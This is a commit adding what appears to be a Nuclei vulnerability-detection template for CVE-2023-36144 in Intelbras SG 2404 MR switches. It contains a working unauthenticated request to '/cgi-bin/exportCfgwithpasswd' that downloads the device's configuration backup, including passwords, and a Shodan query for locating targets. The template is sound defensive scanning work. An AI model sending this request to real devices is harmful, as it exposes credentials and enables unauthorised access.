commit
96f4e43cda
|
@ -0,0 +1,49 @@
|
|||
id: CVE-2023-36144
|
||||
|
||||
info:
|
||||
name: Intelbras Switch - Information Disclosure
|
||||
author: gy741
|
||||
severity: high
|
||||
description: |
|
||||
An authentication bypass in Intelbras Switch SG 2404 MR in firmware 1.00.54 allows an unauthenticated attacker to download the backup file of the device, exposing critical information about the device configuration.
|
||||
remediation: |
|
||||
Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability.
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2023-36144
|
||||
- https://github.com/leonardobg/CVE-2023-36144
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2023-36144
|
||||
cwe-id: CWE-862
|
||||
epss-score: 0.001740000
|
||||
epss-percentile: 0.544840000
|
||||
cpe: cpe:2.3:o:intelbras:sg_2404_mr_firmware:1.00.54:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 1
|
||||
shodan-query: title:"Intelbras"
|
||||
tags: cve,cve2023,intelbras,switch,exposure
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/cgi-bin/exportCfgwithpasswd'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'System Description'
|
||||
- 'System Version'
|
||||
- 'System Name'
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- 'attachment;filename='
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue